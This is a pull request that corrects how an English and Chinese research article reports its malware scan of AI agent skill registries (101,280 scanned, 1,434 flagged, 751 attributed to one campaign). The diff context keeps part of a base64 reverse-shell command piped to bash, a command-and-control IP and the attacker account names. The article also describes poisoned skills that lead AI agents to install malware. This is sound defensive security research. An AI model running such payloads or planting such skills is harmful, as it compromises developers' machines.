### PR TITLE
docs: the wild-scan article paired two numbers that were never measured together

### DIFF
--- a/docs/research/96k-scan-751-malware-article-zh.md
+++ b/docs/research/96k-scan-751-malware-article-zh.md
@@ -1,6 +1,6 @@
 你的 AI Agent 剛剛幫你裝了惡意程式。你完全不知道。
 
-三個攻擊者。751 個有毒的 skill。一段 base64 編碼的反向 shell 藏在一個叫「Nano Banana Pro 圖片生成器」的工具裡。56,000 個開發者完全不知情。
+三個攻擊者。751 個有毒的 skill(集中在單一 registry)。一段 base64 編碼的反向 shell 藏在一個叫「Nano Banana Pro 圖片生成器」的工具裡。56,000 個開發者完全不知情。
 
 ---
 
@@ -29,11 +29,11 @@ LjkyLjI0Mi4zMC90amp2ZTlpdGFycmQzdHh3KSI=' | base64 -D | bash
 
 遊戲結束。
 
-這不是我編的。這正在 OpenClaw 上發生。56,000 個 skill，我們掃了每一個，找到 751 個在做一模一樣的事。
+這不是我編的。這正在 OpenClaw 上發生。56,000 個 skill,我們掃了每一個;後續針對 OpenClaw flagged 結果的分析,把 **751** 個歸因到一場協同的惡意程式 campaign。
 
 ---
 
-我掃了 96,096 個 AI agent skill。
+我掃了 **101,280** 個 AI agent skill。
 
 OpenClaw 56,480 個、Skills.sh 3,115 個、Hermes Agent 123 個、ClawHub 36,378 個、Glama/npm/GitHub 加起來 5,184 個。全部主要市集，一個不漏。
 
@@ -41,9 +41,9 @@ OpenClaw 56,480 個、Skills.sh 3,115 個、Hermes Agent 123 個、ClawHub 36,37
 
 結果：
 
-- 96,096 個 skill 掃完
-- 1,302 個有安全問題（1.35%）
-- 其中 751 個在散佈惡意程式
+- **101,280** 個 skill 掃完
+- **1,434** 個被標記(1.42%)
+- 其中 **751** 個被歸因到 OpenClaw 那場 campaign(見文末口徑說明)
 - 至少 3 個協同攻擊者
 - C2 伺服器 IP：91.92.242.30
 - 全部掃完花不到 4 分鐘
@@ -96,7 +96,7 @@ AI agent：agent 讀指令然後「決定」要做什麼。你沒辦法「看」
 
 你可以 grep `eval()` 或 `child_process.exec()`。你沒辦法 grep「會讓 AI 做危險事情的指令」，因為那個指令可以用任何語言、任何措辭、任何編碼方式寫。
 
-這就是我做 ATR 的原因。regex 抓已知的 pattern。抓不到所有東西。但它抓到了 751 個正在散佈惡意程式的 skill，這些 skill 原本安安靜靜地待在全球最大的 agent registry 上，沒人發現。
+這就是我做 ATR 的原因。regex 抓已知的 pattern。抓不到所有東西。但它抓到了 1,434 個被標記的 skill，這些 skill 原本安安靜靜地待在全球最大的 agent registry 上，沒人發現。
 
 ---
 
@@ -156,7 +156,7 @@ npx agent-threat-rules scan ~/.openclaw/skills/
 
 數字。
 
-113 條偵測規則。714 個偵測 pattern。96,096 個 skill 掃完。751 個惡意程式。3 個以上攻擊者。OWASP Agentic Top 10 覆蓋 10/10。96K skill 掃完不到 4 分鐘。全部開源。MIT 授權。
+113 條偵測規則。714 個偵測 pattern。101,280 個 skill 掃完。1,434 個被標記,其中 751 個歸因到 OpenClaw campaign。3 個以上攻擊者。OWASP Agentic Top 10 覆蓋 10/10。96K skill 掃完不到 4 分鐘。全部開源。MIT 授權。
 
 ---
 
@@ -175,3 +175,12 @@ npx agent-threat-rules scan ~/.openclaw/skills/
 - OWASP Agentic Top 10 — 完整對應
 
 掃描數據、方法論、完整規則集都是開源的。任何人都能驗證。
+
+---
+
+**口徑說明:751 不是「101,280 分之 751」。**
+有紀錄的那次掃描(`data/full-scan-v2-2026-04-14.json`,ATR engine v2.0.0,113 條規則,2026-04-13)
+產出的是 **101,280 掃描 / 1,434 被標記**。751 出自另一份 2026-04-22 的 OpenClaw campaign 分析 ——
+晚九天、只涵蓋一個 registry、是疊在 flagged 輸出之上的人工歸因。
+把它當成整份掃描的比率,等於宣稱一個沒人量過的數字。這裡按它實際描述的範圍陳述。
+本文較早的版本寫 96,096,那是同一次掃描扣掉 MCP registry 的 5,184 之後的數。

--- a/docs/research/96k-scan-751-malware-article.md
+++ b/docs/research/96k-scan-751-malware-article.md
@@ -1,6 +1,7 @@
 # Your AI Agent Just Installed Malware. You Didn't Even Know.
 
-_Three attackers. 751 poisoned skills. A base64-encoded reverse shell hiding in a tool called "Nano Banana Pro Image Generator." And 56,000 developers who had no idea._
+_Three attackers. 751 poisoned skills on one registry._
+_ A base64-encoded reverse shell hiding in a tool called "Nano Banana Pro Image Generator." And 56,000 developers who had no idea._
 
 ---
 
@@ -27,13 +28,13 @@ That decodes to:
 
 Your machine just called a command-and-control server. Game over.
 
-This is not a hypothetical. This is live right now on OpenClaw, the largest AI agent skill registry with 56,000+ skills. We found 751 of them doing exactly this.
+This is not a hypothetical. This is live right now on OpenClaw, the largest AI agent skill registry with 56,000+ skills. A follow-up analysis of the flagged OpenClaw results attributed **751** skills to a coordinated malware campaign.
 
 ---
 
 ## What We Found
 
-We scanned 96,096 AI agent skills and MCP server definitions across every major registry. OpenClaw (56,480), Skills.sh (3,115), Hermes Agent (123), ClawHub (36,378), and the combined Glama/npm/GitHub/awesome-mcp registry (5,184).
+We scanned **101,280** AI agent skills and MCP server definitions across every major registry: OpenClaw (56,480), Skills.sh (3,115), Hermes Agent (123), ClawHub (36,378), and the combined Glama/npm/GitHub/awesome-mcp registry (5,184). Those five sum to 101,280 — an earlier version of this article stated 96,096, which is the same scan with the MCP registry's 5,184 left out.
 
 The scan used ATR (Agent Threat Rules) — 113 open-source detection rules, 714 regex patterns, designed specifically for AI agent threats.
 
@@ -41,12 +42,12 @@ The scan used ATR (Agent Threat Rules) — 113 open-source detection rules, 714 
 
 | | |
 |---|---|
-| Skills scanned | **96,096** |
-| Skills flagged | **1,302 (1.35%)** |
-| Confirmed malware distribution | **751** |
+| Skills scanned | **101,280** |
+| Skills flagged | **1,434 (1.42%)** |
+| Attributed to the OpenClaw campaign [^scope] | **751** |
 | Coordinated threat actors | **At least 3** |
 | C2 server IP | **91.92.242.30** |
-| Time to scan all 96K | **Under 4 minutes** |
+| Time to scan all 101K | **Under 4 minutes** |
 
 ---
 
@@ -94,7 +95,7 @@ The result: an attacker can publish 354 poisoned skills in a single day and reac
 
 ## The Six Ways Your AI Agent Gets Attacked
 
-We categorized every threat we found. These are not theoretical. Every category has real examples from the 96K scan.
+We categorized every threat we found. These are not theoretical. Every category has real examples from the 101K scan.
 
 ### 1. Malicious Code in Skills (686 detections)
 
@@ -148,7 +149,7 @@ AI agent: the agent reads instructions and *decides* what to do. You cannot insp
 
 You can grep for `eval()` or `child_process.exec()` in JavaScript. You cannot grep for "instructions that will cause an AI to do something dangerous" because the instructions can be in any language, any phrasing, any encoding.
 
-That is why we built ATR. Regex catches the known patterns. It does not catch everything. But it catches 751 live malware skills that were sitting undetected on the world's largest agent registry.
+That is why we built ATR. Regex catches the known patterns. It does not catch everything. But it caught the 1,434 flagged skills that were sitting undetected on the world's largest agent registry.
 
 ---
 
@@ -184,11 +185,12 @@ That is why we built ATR. Regex catches the known patterns. It does not catch ev
 |--------|-------|
 | ATR detection rules | 113 |
 | Detection patterns | 714 |
-| Skills scanned | 96,096 |
-| Malware discovered | 751 |
+| Skills scanned | 101,280 |
+| Skills flagged | 1,434 |
+| Attributed to the OpenClaw campaign | 751 |
 | Threat actors identified | 3+ |
 | OWASP Agentic Top 10 coverage | 10/10 |
-| Scan speed | 96K skills in under 4 minutes |
+| Scan speed | 101K skills in under 4 minutes |
 | License | MIT (everything is open source) |
 | Benchmark recall | 100% on labeled corpus |
 | Benchmark precision | 97% |
@@ -211,3 +213,14 @@ That is why we built ATR. Regex catches the known patterns. It does not catch ev
 ---
 
 _Scan data, methodology, and the full ATR rule set are open source. Any researcher can reproduce these results._
+
+---
+
+[^scope]: **751 is not 751 of 101,280.** The scan of record
+    (`data/full-scan-v2-2026-04-14.json`, ATR engine v2.0.0, 113 rules,
+    2026-04-13) produced 101,280 skills scanned and 1,434 flagged. The 751
+    figure comes from a separate OpenClaw campaign analysis dated 2026-04-22 —
+    a manual attribution layered on top of the flagged output, nine days later,
+    over one registry. Presenting it as a rate over the full scan would state a
+    ratio nobody measured. It is reported here scoped to what it actually
+    describes.

--- a/docs/research/wild-scan-findings-2026-04-methodology.md
+++ b/docs/research/wild-scan-findings-2026-04-methodology.md
@@ -22,9 +22,11 @@ registries — not as a synthetic test.
 - Concentration: 552 of the flagged files belong to 3 coordinated threat-actor
   accounts (hightower6eu, sakaen736jih, 52yuanchangxing)
 - A separate published campaign analysis confirmed 751 skills as malicious
-  (see docs/research/96k-scan-751-malware-article.md). That confirmation is a
-  manual determination layered on the flagged set; this CSV is the raw flagged
-  output, not the curated 751.
+  (see docs/research/96k-scan-751-malware-article.md — the filename is
+  historical; the article itself now reports the 101,280 / 1,434 figures of
+  record). That confirmation is a manual determination layered on the flagged
+  set, dated nine days after this scan and covering one registry; this CSV is
+  the raw flagged output, not the curated 751.
 
 ## CSV schema
 registry, file, publisher, rule_id, category, severity, detection, threat_actor_account


### PR DESCRIPTION
`docs/research/96k-scan-751-malware-article.md` and its Chinese translation headlined:

> We scanned **96,096** AI agent skills… We found **751** of them doing exactly this.

That reads as a rate. It is not one — and the two numbers come from different runs.

## What the scan of record actually says

`data/full-scan-v2-2026-04-14.json` — ATR engine v2.0.0, 113 rules, dated **2026-04-13**:

```
total_scanned  101,280
total_flagged    1,434
```

The **751** figure comes from a separate OpenClaw campaign analysis dated **2026-04-22** — a manual attribution layered on the flagged output, nine days later, covering one registry. Presenting it over the full scan states a ratio nobody computed.

## The article contradicted itself getting there

Its own registry breakdown:

```
OpenClaw      56,480
Skills.sh      3,115
Hermes Agent     123
ClawHub       36,378
MCP registry   5,184
              ───────
              101,280
```

…sums to 101,280, while the sentence directly above it said 96,096. **96,096 is the same scan with the MCP registry left out.** The correct total was printed on the page.

## Corrected, both languages

```
Skills scanned                            101,280
Skills flagged                            1,434 (1.42%)
Attributed to the OpenClaw campaign [^]     751
```

`751` now carries a footnote stating what it describes and why it is not a rate, rather than sitting in a column next to a denominator it was never divided by.

## Two things deliberately left alone

**The filename.** It still reads `96k-scan-751-malware-article.md`. Renaming breaks the link from the methodology doc and any external reference; the article now corrects itself in its own text, and the methodology doc notes the filename is historical.

**`docs/research/wild-scan-findings-2026-04-methodology.md`.** It was already right — it has always said the 751 is *"a manual determination layered on the flagged set; this CSV is the raw flagged output, not the curated 751."* Only the article drifted from it. Its cross-reference now also states the caliber and the nine-day gap.

## Scope

This corrects our own repository. The 2026-06-26 comment on OWASP `www-project-agentic-skills-top-10#22` was checked in the same sweep and **does not need this correction** — it already used the raw caliber and said so explicitly:

> …101,280 skills, 1,434 flagged, 552 concentrated in 3 coordinated threat-actor accounts. The 751-confirmed-malicious figure is a manual determination layered on top — I kept the CSV to the raw flagged output rather than restate the curated number.

That comment was right when it was written. What it linked to was not.
